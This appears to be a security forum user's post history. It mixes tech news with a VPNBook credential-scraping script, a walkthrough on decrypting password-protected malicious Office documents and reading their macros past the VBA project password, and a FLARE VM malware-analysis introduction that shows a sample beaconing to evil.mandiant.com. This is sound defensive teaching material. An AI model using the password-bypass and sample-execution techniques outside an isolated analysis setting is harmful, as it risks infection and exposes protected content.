Everything posted by Usr6

  1. A few hours ago a cryptocurrency miner appeared on The Pirate Bay website, using the computer resources of visitors to mine Monero coins. The operators of The Pirate Bay are testing it as a new way to generate revenue, but many users aren't happy. Four years ago many popular torrent sites added an option to donate via Bitcoin. The Pirate Bay was one of the first to jump on board and still lists its address on the website. While there’s nothing wrong with using Bitcoin as a donation tool, adding a Javascript cryptocurrency miner to a site is of a totally different order. A few hours ago many Pirate Bay users began noticing that their CPU usage increased dramatically when they browsed certain Pirate Bay pages. Upon closer inspection, this spike appears to have been caused by a Bitcoin miner embedded on the site. The code in question is tucked away in the site’s footer and uses a miner provided by Coinhive. This service offers site owners the option to convert the CPU power of users into Monero coins. The miner does indeed appear to increase CPU usage quite a bit. It is throttled at different rates (we’ve seen both 0.6 and 0.8) but the increase in resources is immediately noticeable. The miner is not enabled site-wide. When we checked, it appeared in the search results and category listings, but not on the homepage or individual torrent pages. There has been no official comment from the site operators on the issue (update, see below), but many users have complained about it. In the official site forums, TPB supermoderator Sid is clearly not in agreement with the site’s latest addition. “That really is serious, so hopefully we can get some action on it quickly. And perhaps get some attention for the uploading and commenting bugs while they’re at it,” Sid writes. Like many others, he also points out that blocking or disabling Javascript can stop the automatic mining. 
This can be done via browser settings or through script blocker addons such as NoScript and ScriptBlock. Alternatively, people can block the miner URL with an ad-blocker. Whether the miner is a new and permanent tool, or perhaps triggered by an advertiser, is unknown at this point. When we hear more this article will be updated accordingly. Update: We were told that the miner is being tested for a short period (~24 hours) as a new way to generate revenue. This could eventually replace the ads on the site. More info may be revealed later. Source: https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/
  2. md5 (OldGarage.jpg) = 1427C48D8CAB1CF6CB6C628FDEBCC0D7
  3. https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-caliskan-islam.pdf
  4. Like any free service, the one offered by https://www.vpnbook.com/ has small "imperfections"; in this case, one of them is the need to visit the site regularly to obtain the login details. With this automation we will remove this small drawback. It is assumed that OpenVPN is used.
     Modifying the config file (location: C:\Program Files\OpenVPN\config\) so that the login details are read from a file: in the ".ovpn" file we replace the line:
         auth-user-pass
     with:
         auth-user-pass "D:\\vpn_book.txt"
     Automation:
         # Python 2.7
         import urllib2
         import re

         vpn = "http://www.vpnbook.com/"
         # Fetch the vpnbook page that publishes the current credentials
         response = urllib2.urlopen(vpn)
         data = response.read()

         # Pull the username and password out of the page's HTML
         u = re.search(r"Username: (\w+)<", data)
         p = re.search(r"Password: (\w+)<", data)
         if u and p:
             utilizator = u.group(1)
             parola = p.group(1)
             # Write them in the two-line format OpenVPN expects for auth-user-pass
             with open("D:\\vpn_book.txt", "w") as login_file:
                 login_file.write(utilizator + "\n" + parola)
         else:
             print "Could not find the login details on the page"
     Each time the script above is run, the login details in the file d:\\vpn_book.txt will be refreshed.
  5. Who should read this? Technical people who want to get up to speed on machine learning quickly Non-technical people who want a primer on machine learning and are willing to engage with technical concepts Anyone who is curious about how machines think This guide is intended to be accessible to anyone. Basic concepts in probability, statistics, programming, linear algebra, and calculus will be discussed, but it isn’t necessary to have prior knowledge of them to gain value from this series. Part 1: Why Machine Learning Matters. The big picture of artificial intelligence and machine learning — past, present, and future. Part 2.1: Supervised Learning. Learning with an answer key. Introducing linear regression, loss functions, overfitting, and gradient descent. Part 2.2: Supervised Learning II. Two methods of classification: logistic regression and SVMs. Part 2.3: Supervised Learning III. Non-parametric learners: k-nearest neighbors, decision trees, random forests. Introducing cross-validation, hyperparameter tuning, and ensemble models. Part 3: Unsupervised Learning. Clustering: k-means, hierarchical. Dimensionality reduction: principal components analysis (PCA), singular value decomposition (SVD). Part 4: Neural Networks & Deep Learning. Why, where, and how deep learning works. Drawing inspiration from the brain. Convolutional neural networks (CNNs), recurrent neural networks (RNNs). Real-world applications. Part 5: Reinforcement Learning. Exploration and exploitation. Markov decision processes. Q-learning, policy learning, and deep reinforcement learning. The value learning problem. Appendix: The Best Machine Learning Resources. A curated list of resources for creating your machine learning curriculum.
  6. Will this presentation make me an optical engineer? Maybe, but just remember, I omitted almost all the math. The purpose of this tutorial is to touch on a little bit of every topic, from the mundane to the advanced and unusual. But it helps to have a basic understanding of how and why things work, even if you aren’t designing fiber networks. https://www.nanog.org/sites/default/files/2_Steenbergen_Tutorial_New_And_v2.pdf
  7. Reverse Engineering Malware 102
     Material: Introduction; Section 1) Setup; Section 2) Information Gathering; Section 3) Creating Travel Directions; Section 4) Identifying Encryption; Section 5) Evasion Techniques; Section 6) Identifying Packing; Section 7) Extra Fun; Section 8) Conclusion
     Source: https://securedorg.github.io/RE102/
  8. June 29, 2017 ~ R3MRUM Over the past year-or-so, there seems to have been an uptick of miscreants password protecting the malicious office documents that they send to their target victims. They do this in an effort to bypass detection and thwart analysis. This blog details a few different tools and methodologies that can be used to analyze such files. Delivery & File Type These malicious documents typically end up making their way to the end point via email. The email message typically consists of some ruse to entice the user to open the document and, conveniently, includes the password needed to decrypt it (Figure 1). Figure 1: Example email with password protected MS Office document attached and password in message body. The ‘m’ at the end of the ‘.dotm’ file extension, shown in Figure 1, tells you that the file attached is macro-enabled. In this instance, it is an MS Office Document Template file but it could have just as easily been a ‘.docm’ file, ‘.xlsm’ file, or any other macro-enabled file type supported by MS Office 2007 or newer. Feel free to read more about these file types on Microsoft’s website. Figure 2 shows the prompt that you are presented with when you open a password protected Office document: Figure 2: Password prompt received when opening a password protected office document. Failed Analysis Method #1: Copy Macros When I first encountered this type of malicious document, my first instinct was to launch the document in an isolated sandbox, enter in the password provided to me in the message body, and then copy the embedded VBA macro code from the document into notepad where I can then perform my analysis. This technically could have worked if the miscreant did not also password protect the Visual Basic Project containing the malicious VBA code with a separate unknown password (Figure 3). Figure 3: Password prompt received when attempting to gain access to macro code. 
Failed Analysis Method #2: Re-Save Without Password My second thought was: “After I open the document and enter in the initial password, I’ll just re-save the document without a password. Then I’ll be able to use my analysis tools to inspect the file’s contents.” Unfortunately, this doesn’t work either due to the fact that the VB Project within the encrypted document is also password protected. If you attempt this method, the contents of the document (images, text, etc.) will still be present within the unencrypted copy of the document but any embedded macros will be stripped. Successful Analysis Method #1: Decrypt with MSOffice-Crypt & Analyze w/ olevba|ViperMonkey Let me introduce you to a nifty little tool called msoffice-crypt. This bad mama jama enables you to dump a decrypted version of the encrypted office document out to a file. As a bonus, it works in both Windows and Linux! Figure 4: msoffice-crypt options & decrypting of encrypted Office document In Figure 4, I ran msoffice-crypt.exe without any arguments so that you can see the different supported options. Then, in the highlighted section, I ran the following command, which decrypted smith.dotm using the password “6429”: msoffice-crypt.exe -d -p 6429 smith.dotm If you did not provide an output file name, msoffice-crypt will default to appending an “_d” to the file name, like so: smith_d.dotm. Figure 5: Decrypted document created within the current working directory Sure enough, we see in Figure 5 that the decrypted Office document has been created. Now, if we launch this newly created document (in an isolated environment, of course!), you should no longer receive the password prompt. Figure 6: Office document decrypted. Password no longer needed to open. Voilà! No password prompt received! (Figure 6) If you didn’t know, MS Office 2007+ documents are OpenXML format which means they are actually just compressed archives that you can decompress using your favorite archive extractor (WinZip, 7z, etc.).
We can also spot the difference between the encrypted and decrypted documents by comparing the decompressed contents of both. Figure 7: Contents of decompressed encrypted Office document Figure 7 shows the contents of my encrypted Office document whereas Figure 8 shows the contents of my decrypted Office document. Figure 8: Contents of decompressed decrypted Office document The contents depicted in both Figures 7 and 8 are typical and should match what you are seeing in whatever OpenXML formatted Office document you are analyzing; not just this sample. This actually segues nicely into the next step, which is to extract out the VBA Macro code. If you recall, the malware author also password protected the VB Project containing the macro code. While I am not aware of any tool that will strip this protection from the document, it doesn’t matter as existing tools such as oletools, ViperMonkey, etc. completely bypass it. Back in the day (like 3 months ago), I would have extracted out the VBA code by decompressing the OpenXML archive, locating the OLE binary within the “word” folder (i.e. vbaProject.bin), and then using something like OfficeMalScanner (Figures 9 & 10): Figure 9: Running OfficeMalScanner against OLE binary found within OpenXML archive Figure 10: VBA code extracted from OLE binary using OfficeMalScanner … or olevba from the oletools suite (Figure 11): Figure 11: VBA code extracted from OLE binary using olevba But this is old-school. These days, all the kids are using ViperMonkey. ViperMonkey not only extracts the VBA for you but also emulates execution so that if the VBA is heavily obfuscated (in this case, it is not), you can quickly and safely derive what the code is actually doing. Also, it can handle OpenXML files so there is no need to extract the archive and locate the OLE binary.
Figure 12: Analysis of the decrypted Office document using ViperMonkey Figure 12 shows how ViperMonkey not only extracts and displays the embedded VBA macro but it also gives you the execution flow of the malicious code in a quick and easy-to-ingest format. This dramatically reduces analysis time which, in turn, expedites time-to-respond. If I ever meet Philippe Lagadec (@decalage2), I’m going to buy that man a beer! Successful Analysis Method #2: Simply Open w/ LibreOffice You’re probably going to hate me for making you step through the entire blog before mentioning – what turns out to be – the simplest (and laziest) solution for accessing the embedded VBA code within a password protected document/project. Since REMNux doesn’t come packaged with LibreOffice, you’ll need to install it by simply running: sudo apt-get install libreoffice Once installed, open the encrypted Office document in LibreOffice by running: libreoffice smith.dotm Like when you opened the encrypted Office document within MS Office (Figure 2), you will be requested to enter in the document’s password (Figure 13). Figure 13: LibreOffice password prompt When you enter in the password, the document will successfully load. Now, you will be able to access the embedded VBA macro code by navigating to: Tools –> Macros –> Organize Macros –> LibreOffice Basic You will be presented with a pop-up window (Figure 14) where you will need to find the project containing the VBA code and hit the Edit button. Figure 14: LibreOffice’s Macro Editor Dialogue And BOOM! LibreOffice’s Basic Editor opens; giving you direct access to the VBA macro code without needing to also know the VB Project’s password (Figure 15): Figure 15: LibreOffice’s Basic Editor providing access to embedded VBA code. Bypassing password. That’s it! It’s that simple! My personal preference is the first method as I’m a command-line junkie.
But, if you are more comfortable with performing your analysis via a GUI, then the LibreOffice method might be a better fit for you! Regardless, knowing multiple methods for solving a single problem will only make you a better analyst.
     References:
     Open XML Formats and file name extensions
     How to remove a password from a document
     MSOffice-Crypt: A tool/lib to encrypt/decrypt Microsoft Office Document
     Wikipedia: Office Open XML
     OfficeMalScanner
     Decalage2: oletools GitHub
     Decalage2: ViperMonkey GitHub
     LibreOffice Wiki
     Source: https://r3mrum.wordpress.com/2017/06/29/analyzing-malicious-password-protected-office-documents/
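As an added example (not code from the post above or from R3MRUM), this Python 3 triage helper applies two facts from the walkthrough: an OpenXML document is a zip archive whose macros live in a vbaProject.bin part under the "word" folder, while the still-encrypted file that msoffice-crypt unwraps is not a zip at all but an OLE compound container (the MS-OFFCRYPTO wrapper, which is also the legacy .doc/.xls format). It classifies a document by its magic bytes and, for a plain package, lists the VBA parts and checks [Content_Types].xml for the VBA content type; the sample documents are constructed in memory, and the OLE branch only looks at the header (assumption: no OLE stream parsing is attempted).

```python
"""Triage helper for OOXML / macro-enabled Office documents (added example)."""
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # Compound File Binary header
ZIP_MAGIC = b"PK\x03\x04"                          # first local file header of a zip
# Word, Excel and PowerPoint packages keep the VBA project in this part.
VBA_PART = re.compile(r"^(word|xl|ppt)/vbaProject\.bin$")
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def classify(data):
    """Return a small triage record for an in-memory Office document."""
    result = {"container": "unknown", "vba_parts": [], "vba_content_type": False}
    if data.startswith(OLE_MAGIC):
        # Encrypted OOXML and legacy binary Office both use the OLE container,
        # so zip-based tooling will not see a vbaProject.bin until it is decrypted.
        result["container"] = "ole"
        return result
    if not data.startswith(ZIP_MAGIC):
        return result
    result["container"] = "ooxml"
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        result["vba_parts"] = sorted(n for n in names if VBA_PART.match(n))
        if "[Content_Types].xml" in names:
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            result["vba_content_type"] = VBA_CONTENT_TYPE in types_xml
    return result


def classify_file(path):
    """Same as classify(), for a document on disk."""
    with open(path, "rb") as fh:
        return classify(fh.read())


def build_sample_package(with_macro):
    """Constructed sample: a minimal Word-like OOXML package, optionally with a
    placeholder vbaProject.bin part and the matching content-type override."""
    types = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
        '<Default Extension="xml" ContentType="application/xml"/>',
    ]
    if with_macro:
        types.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>'
                     % VBA_CONTENT_TYPE)
    types.append("</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "\n".join(types))
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 16)  # placeholder, not real VBA
    return buf.getvalue()


def build_sample_ole():
    """Constructed sample: a 512-byte CFB header with the OLE signature, which is
    all this triage needs to flag an encrypted (or legacy binary) document."""
    return OLE_MAGIC + b"\x00" * 504


if __name__ == "__main__":
    for label, blob in [("macro-enabled package", build_sample_package(True)),
                        ("plain package", build_sample_package(False)),
                        ("ole container", build_sample_ole())]:
        print(label, "->", classify(blob))
```

On the post's own files, classify_file("smith.dotm") would report the "ole" container before decryption and "ooxml" with word/vbaProject.bin on smith_d.dotm, which is a quick way to confirm msoffice-crypt did its job before handing the file to olevba or ViperMonkey.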
  9. As a reverse engineer on the FLARE Team I rely on a customized Virtual Machine (VM) to perform malware analysis. The Virtual Machine is a Windows installation with numerous tweaks and tools to aid my analysis. Unfortunately trying to maintain a custom VM like this is very laborious: tools frequently get out of date and it is hard to change or add new things. There is also a constant fear that if the VM gets corrupted it would be super tedious to replicate all of the settings and tools that I’ve built up over the years. To address this and many related challenges, I have developed a standardized (but easily customizable) Windows-based security distribution called FLARE VM. FLARE VM is a freely available and open sourced Windows-based security distribution designed for reverse engineers, malware analysts, incident responders, forensicators, and penetration testers. Inspired by open-source Linux-based security distributions like Kali Linux, REMnux and others, FLARE VM delivers a fully configured platform with a comprehensive collection of Windows security tools such as debuggers, disassemblers, decompilers, static and dynamic analysis utilities, network analysis and manipulation, web assessment, exploitation, vulnerability assessment applications, and many others. The distribution also includes the FLARE team’s public malware analysis tools such as FLOSS and FakeNet-NG. How To Get It You are expected to have an existing installation of Windows 7 or above. This allows you to choose the exact Windows version, patch level, architecture and virtualization environment yourself. 
Once you have that available, you can quickly deploy the FLARE VM environment by visiting the following URL in Internet Explorer (other browsers are not going to work): http://boxstarter.org/package/url?https://raw.githubusercontent.com/fireeye/flare-vm/master/flarevm_malware.ps1 After you navigate to the above URL in the Internet Explorer, you will be presented with a Boxstarter WebLauncher dialog. Select Run to continue the installation as illustrated in Figure 1. Following successful installation of Boxstarter WebLauncher, you will be presented with a console window and one more prompt to enter your Windows password as shown in Figure 2. Your Windows password is necessary to restart the machine several times during the installation without prompting you to login every time. Figure 2: Boxstarter Password Prompt The rest of the process is fully automated, so prepare yourself a cup of coffee or tea. Depending on your connection speed, the initial installation takes about 30-40 minutes. Your machine will also reboot several times due to the requirements of the numerous software installations. During the deployment process, you will see installation logs of a number of packages. Once the installation is complete, it is highly recommended to switch the Virtual Machine networking settings to Host-Only mode so that malware samples would not accidentally connect to the Internet or local network. Also, take a fresh virtual machine snapshot so this clean state is saved! The final FLARE VM installation should look like Figure 3. NOTE: If you encounter a large number of error messages, try to simply restart the installation. All of the existing packages will be preserved and new packages will be installed. Getting Started The VM configuration and the included tools were either developed or carefully selected by the members of the FLARE team who have been reverse engineering malware, analyzing exploits and vulnerabilities, and teaching malware analysis classes for over a decade.
All of the tools are organized in the directory structure shown in Figure 4. Figure 4: FLARE VM Tools While we attempt to make the tools available as a shortcut in the FLARE folder, there are several available from command-line only. Please see the online documentation at http://flarevm.info for the most up to date list. Sample Analysis In order to best illustrate how FLARE VM can assist in malware analysis tasks let’s perform a basic analysis on one of the samples we use in our Malware Analysis Crash Course. First, let’s obtain some basic indicators by looking at the strings in the binary. For this exercise, we are going to run FLARE’s own FLOSS tool, which is a strings utility on steroids. Visit http://flosseveryday.info for additional information about the tool. You can launch it by clicking on the FLOSS icon in the taskbar and running it against the sample as illustrated in Figure 5. Unfortunately, looking over the resulting strings in Figure 6 only one string really stands out and it is not clear how it is used. Figure 6: Strings Analysis Let’s dig a bit more into the binary by opening up CFF Explorer in order to analyze the sample’s imports, resources, and PE header structure. CFF Explorer and a number of other utilities are available in the FLARE folder that can be accessed from the Desktop or the Start menu as illustrated in Figure 7. Figure 7: Opening Utilities While analyzing the PE header, there were several indicators that the binary contains a resource object with an additional payload. For example, the Import Address Table contained relevant Windows API calls such as LoadResource, FindResource and finally WinExec. Unfortunately, as you can see in Figure 8 the embedded payload “BIN” contains junk so it is likely encrypted. Figure 8: PE Resource At this point, we could continue the static analysis or we could “cheat” a bit by switching over to basic dynamic analysis techniques.
Let’s attempt to quickly gather basic indicators by using another FLARE tool called FakeNet-NG. FakeNet-NG is a dynamic network emulation tool which tricks malware into revealing its network functionality by presenting it with fake services such as DNS, HTTP, FTP, IRC and many others. Please visit http://fakenet.info for additional information about the tool. Also, let’s launch Procmon from Sysinternals Suite in order to monitor all of the File, Registry and Windows API activity as well. You can find both of these frequently used tools in the taskbar illustrated in Figure 9. Figure 9: Dynamic Analysis After executing the sample with Administrator privileges, we quickly find excellent network- and host-based indicators. Figure 10 shows FakeNet-NG responding to the malware’s attempt to communicate with evil.mandiant.com using the HTTP protocol. Here we capture useful indicators such as a complete HTTP header, URL and a potentially unique User-Agent string. Also, notice that FakeNet-NG is capable of identifying the exact process that is communicating, which is level1_payload.exe. This process name corresponds to the unique string that we have identified in the static analysis, but couldn’t understand how it was used. Figure 10: FakeNet-NG Comparing our findings with the output of Procmon in Figure 11, we can confirm that the malware is indeed responsible for creating the level1_payload.exe executable in the system32 folder. Figure 11: Procmon As part of the malware analysis process, we could continue digging deeper by loading the sample in a disassembler and performing further analysis inside a debugger. However, I would not want to spoil this fun for our Malware Analysis Crash Course students by sharing all the answers here.
That said, all of the relevant tools to perform such analysis are already included in the distribution such as IDA Pro and Binary Ninja disassemblers, a nice collection of debuggers and several plugins, and many others to make your reverse engineering tasks as convenient as possible. Have It Your Way FLARE VM is a constantly growing and changing project. While we try to cover as many use-case scenarios as possible, it is simply impossible due to the nature of the project. Luckily, FLARE VM is extremely easy to customize because it was built on top of the Chocolatey project. Chocolatey is a Windows-based package management system with thousands of packages. You can find the list here: https://chocolatey.org/packages In addition to the public Chocolatey repository, FLARE VM uses our own FLARE repository which is constantly growing and currently contains about 40 packages. What all this means is that if you want to quickly add some package, let’s say Firefox, you no longer have to navigate to the software developer’s website. Simply open up a console and type in the command in Figure 12 to automatically download and install any package: Figure 12: Installing packages In a few short moments, the Firefox icon is going to appear on your Desktop with no user interaction necessary. Staying up to date As I’ve mentioned at the beginning, one of the hardest challenges of an unmanaged Virtual Machine is trying to keep all the tools up to date. FLARE VM solves this problem. You can completely update the entire system by simply running the command in Figure 13. Figure 13: Staying up to date If any of the installed packages have newer versions, they will be automatically downloaded and installed. NOTE: Don’t forget to take another clean snapshot of an updated system and set networking back to Host-Only. Conclusion I hope you enjoy this new free tool and will adopt it as another trusted resource to perform reverse engineering and malware analysis tasks.
Next time you need to set up a new malware analysis environment, try out FLARE VM! In these few pages, we could only scratch the surface of everything that FLARE VM is capable of; however, feel free to leave your comments, tool requests, and bugs on our Github issues page here: https://github.com/fireeye/flare-vm or http://flarevm.info/
     Installed Tools
     Debuggers: OllyDbg + OllyDump + OllyDumpEx, OllyDbg2 + OllyDumpEx, x64dbg, WinDbg
     Disassemblers: IDA Free, Binary Ninja Demo
     Java: JD-GUI
     Visual Basic: VBDecompiler
     Flash: FFDec
     .NET: ILSpy, DNSpy, DotPeek, De4dot
     Office: Offvis
     Hex Editors: FileInsight, HxD, 010 Editor
     PE: PEiD, ExplorerSuite (CFF Explorer), PEview, DIE
     Text Editors: SublimeText3, Notepad++, Vim
     Utilities: MD5, 7zip, Putty, Wireshark, RawCap, Wget, UPX, Sysinternals Suite, API Monitor, SpyStudio, Checksum, Unxutils
     Python, Modules, Tools: Python 2.7, Hexdump, PEFile, Winappdbg, FakeNet-NG, Vivisect, FLOSS, FLARE_QDB, PyCrypto, Cryptography
     Other: VC Redistributable Modules (2008, 2010, 2012, 2013)
     Sources: https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html https://github.com/fireeye/flare-vm
  10. Udemy: Learn Programming in Python With the Power of Animation. This is a Programming Course in Python. It will teach you coding from scratch with the Power of Animation&programming https://www.udemy.com/learn-programming-in-python-with-the-power-of-animation/?couponCode=PBCUDEMYGROUPS
  11. Authorities arrested the UK security researcher known for stopping the WannaCry ransomware attack in May. On Wednesday, 22-year-old Marcus Hutchins -- also known as MalwareTech -- was arrested in Las Vegas for "his role in creating and distributing the Kronos banking Trojan," according to a spokesperson from the U.S. Department of Justice. The charges relate to alleged conduct occurring between July 2014 and July 2015. According to an indictment provided to CNN Tech, Hutchins created the malware and shared it online. Earlier this year, Hutchins became an internet hero when he helped stop WannaCry, a cyberattack that targeted over 150 countries. The ransomware locked down computers and demanded $300 to get files back. Hutchins, who is a malware researcher at the Kryptos Logic security firm, created a killswitch that prevented the spread of the virus. Friends and family have not been able to speak with Hutchins, according to a person close to the situation. The news of the detention was first reported by Motherboard. This story is developing. Source: http://money.cnn.com/2017/08/03/technology/culture/malwaretech-arrested-las-vegas-trojan/index.html The indictment: https://www.documentcloud.org/documents/3912524-Kronos-Indictment-R.html On the same subject: https://motherboard.vice.com/en_us/article/ywp8k5/researcher-who-stopped-wannacry-ransomware-detained-in-us-after-def-con https://www.theguardian.com/technology/2017/aug/03/researcher-who-stopped-wannacry-ransomware-detained-in-us?CMP=share_btn_tw
  12. Kali Linux is comprised of many powerful tools but you cannot put them to good use if you don’t master the underlying operating system. This book covers everything you need to know to be able to effectively use and deploy Kali Linux. This book will discuss basic Linux usage for beginners, Debian package management and usage, Kali installation, configuration, security, and advanced Kali usage including how Kali fits within the enterprise and Kali’s role in various phases of a security assessment. It will serve as an introduction to Kali for beginners but also to cater to users pursuing Kali certification and advanced users seeking more in-depth use cases and inspiration. https://kali.training/downloads/Kali_Revealed_1st_edition.pdf
  13. A bill that bans the use of proxies, Tor, and VPNs passed the Russian government's two legislative bodies and has now reached the desk of President Vladimir Putin, who can now sign it into law just by a stroke of his quill. The Russian Parliament (Duma) approved the proposed bill last week, while yesterday, the bill moved through the Russian Federation Council. The bill passed despite street protests in Moscow over the weekend. Thousands showed up to protest the bill and support a free Internet. The turnout varies from source to source, ranging from 800 to 10,000 protesters. ISPs have to implement the ban The bill is a reaction to Russian Internet users that started using these services to avoid state-sanctioned bans. Under the new bill, Russian Internet service providers have to implement blocks that prevent users from using proxies, Tor, or VPNs to avoid state-sanctioned bans. Russia, through its Roskomnadzor Internet watchdog, regularly bans access to certain websites it deems too explicit or promoting terrorist or extremist content. While some users employ proxies, Tor, or VPNs to access news outlets supporting Russian opposition, most Russians use it to access torrent portals and pornographic websites, some of which are blocked in the country. The bill was put together and forwarded by Roskomnadzor at the request of Russia's Security Council. Russia to become first country to officially block Tor, VPNs If signed into law, Russia will become the first country where officials ban proxies, Tor, and VPNs. Despite popular opinion, China does not block these tools. Instead, China requires VPN providers to register with state authorities. VPN providers approved to function in the country must enforce the same bans that Chinese authorities enforce via the government's Great Firewall. Countries like Turkey have also banned Tor and VPNs, but it was only a temporary measure, or the government targeted only some VPN providers, not all.
Source: https://www.bleepingcomputer.com/news/government/russia-passes-bill-banning-proxies-tor-and-vpns/
  14. The HyperV Architecture and its Memory Manager - Andrea Allievi
      SGX Enclave programming: common mistakes - Michael Atlas
      Digging Into the Core of Boot - Yuriy Bulygin, Oleksandr Bazhaniuk
      BASS Automated Signature Synthesizer - Mariano Graziano, Jonas Zaddach
      BinCAT: purrfecting binary static analysis - Philippe Biondi, Xavier Mehrenberger, Raphaël Rigo, Sarah Zennou
      Bochspwn Reloaded: Detecting Kernel Memory Disclosure with x86 Emulation and Taint Tracking - Mateusz “j00ru” Jurczyk
      Bubble Struggle - Call Graph Visualization with Radare2 - Marion Marschalek
      You can run, but you can’t hide - Vlad Sabaka
      Crypton - Exposing malware’s deepest secrets - Julia Karpin, Anna Dorfman
      Reverse Engineering DSSS - Michael Ossmann
      Exporting IDA Debug Information - Adam Schwalm
      FreeCalypso: a fully liberated GSM baseband - Mychaela Falconia
      POSTSCRIPT - FreeCalypso: a fully liberated GSM baseband - Mychaela Falconia
      Hacking Cell Phone Embedded Systems - Keegan Ryan
      The Life-Changing Magic of IDAPython: Embedded Device Edition - Maddie Stone
      MazeWalker - Enriching static malware analysis - Yevgeniy Kulakov
      Miasm: reverse engineering framework - Fabrice Desclaux, Camille Mougey
      ZapZap! bangBang! - Ang Cui, Rick Housley
      Source: https://recon.cx/2017/montreal/slides/
  15. Category | Title | Format
      Azure | Introducing Windows Azure™ for IT Professionals | PDF MOBI EPUB
      Azure | Microsoft Azure Essentials Azure Automation | PDF MOBI EPUB
      Azure | Microsoft Azure Essentials Azure Machine Learning | PDF MOBI EPUB
      Azure | Microsoft Azure Essentials Fundamentals of Azure | PDF MOBI EPUB
      Azure | Microsoft Azure Essentials Fundamentals of Azure, Second Edition | PDF
      Azure | Microsoft Azure Essentials Fundamentals of Azure, Second Edition Mobile | PDF
      Azure | Microsoft Azure Essentials Migrating SQL Server Databases to Azure – Mobile | PDF
      Azure | Microsoft Azure Essentials Migrating SQL Server Databases to Azure 8.5X11 | PDF
      Azure | Microsoft Azure ExpressRoute Guide | PDF
      Azure | Overview of Azure Active Directory | DOC
      Azure | Rapid Deployment Guide For Azure Rights Management | PDF
      Azure | Rethinking Enterprise Storage: A Hybrid Cloud Model | PDF MOBI EPUB
      BizTalk | BizTalk Server 2016 Licensing Datasheet | PDF
      BizTalk | BizTalk Server 2016 Management Pack Guide | DOC
      Cloud | Enterprise Cloud Strategy | PDF MOBI EPUB
      Cloud | Enterprise Cloud Strategy – Mobile | PDF
      Developer | .NET Microservices: Architecture for Containerized .NET Applications | PDF
      Developer | .NET Technology Guidance for Business Applications | PDF
      Developer | Building Cloud Apps with Microsoft Azure™: Best practices for DevOps, data storage, high availability, and more | PDF MOBI EPUB
      Developer | Containerized Docker Application Lifecycle with Microsoft Platform and Tools | PDF
      Developer | Creating Mobile Apps with Xamarin.Forms, Preview Edition 2 | PDF MOBI EPUB
      Developer | Creating Mobile Apps with Xamarin.Forms: Cross-platform C# programming for iOS, Android, and Windows | PDF MOBI EPUB
      Developer | Managing Agile Open-Source Software Projects with Microsoft Visual Studio Online | PDF MOBI EPUB
      Developer | Microsoft Azure Essentials Azure Web Apps for Developers | PDF MOBI EPUB
      Developer | Microsoft Platform and Tools for Mobile App Development | PDF
      Developer | Microsoft Platform and Tools for Mobile App Development – Mobile | PDF
      Developer | Moving to Microsoft® Visual Studio® 2010 | XPS PDF MOBI EPUB
      Developer | Programming Windows 8 Apps with HTML, CSS, and JavaScript | PDF MOBI EPUB
      Developer | Programming Windows Store Apps with HTML, CSS, and JavaScript, Second Edition | PDF MOBI EPUB
      Developer | Programming Windows® Phone 7 (Special Excerpt 2) | XPS PDF
      Developer | Team Foundation Server to Visual Studio Team Services Migration Guide | PDF
      Dynamics | 5 cool things you can do with CRM for tablets | PDF
      Dynamics | Create Custom Analytics in Dynamics 365 with Power BI | PDF
      Dynamics | Create or Customize System Dashboards | PDF
      Dynamics | Create Your First CRM Marketing Campaign | PDF
      Dynamics | CRM Basics for Outlook basics | PDF
      Dynamics | CRM Basics for Sales Pros and Service Reps | PDF
      Dynamics | Give Great Customer Service with CRM | PDF
      Dynamics | Go Mobile with CRM for Phones – Express | PDF
      Dynamics | Go Mobile with CRM for Tablets | PDF
      Dynamics | Import Contacts into CRM | PDF
      Dynamics | Introducing Microsoft Social Engagement | PDF
      Dynamics | Introduction to Business Processes | PDF
      Dynamics | Meet Your Service Goals with SLAs and Entitlements | PDF
      Dynamics | Microsoft Dynamics CRM 2016 Interactive Service Hub User Guide | PDF
      Dynamics | Microsoft Dynamics CRM 2016 On-Premises Volume Licensing and Pricing Guide | PDF
      Dynamics | Microsoft Dynamics CRM for Outlook Installing Guide for use with Microsoft Dynamics CRM Online | PDF
      Dynamics | Microsoft Dynamics CRM Resource Guide 2015 | PDF
      Dynamics | Microsoft Social Engagement for CRM | PDF
      Dynamics | Product Overview and Capability Guide Microsoft Dynamics NAV 2016 | PDF
      Dynamics | RAP as a Service for Dynamics CRM | PDF
      Dynamics | Set Up A Social Engagement Search For Your Product | PDF
      Dynamics | Social is for Closers | PDF
      Dynamics | Start Working in CRM | PDF
      Dynamics | Your Brand Sux | PDF
      General | 10 essential tips and tools for mobile working | PDF
      General | An employee’s guide to healthy computing | PDF
      General | Guide for People who have Language or Communication Disabilities | DOC
      General | Guide for People who have Learning Disabilities | DOC
      Licensing | Introduction to Per Core Licensing and Basic Definitions | PDF
      Licensing | Licensing Windows and Microsoft Office for use on the Macintosh | PDF
      Licensing | VLSC Software Assurance Guide | PDF
      Licensing | Windows Server 2016 and System Center 2016 Pricing and Licensing FAQs | PDF
      Office | Access 2013 Keyboard Shortcuts | PDF
      Office | Azure AD/Office 365 seamless sign-in | PDF
      Office | Content Encryption in Microsoft Office 365 | PDF
      Office | Controlling Access to Office 365 and Protecting Content on Devices | PDF
      Office | Customize Word 2013 Keyboard Shortcuts | PDF
      Office | Data Resiliency in Microsoft Office 365 | PDF
      Office | Excel 2013 Keyboard Shortcuts | PDF
      Office | Excel 2016 keyboard shortcuts and function keys | DOC
      Office | Excel Online Keyboard Shortcuts | PDF
      Office | File Protection Solutions in Office 365 | PDF
      Office | First Look: Microsoft® Office 2010 | XPS PDF
      Office | Get Started With Microsoft OneDrive | PDF
      Office | Get Started With Microsoft Project Online | PDF
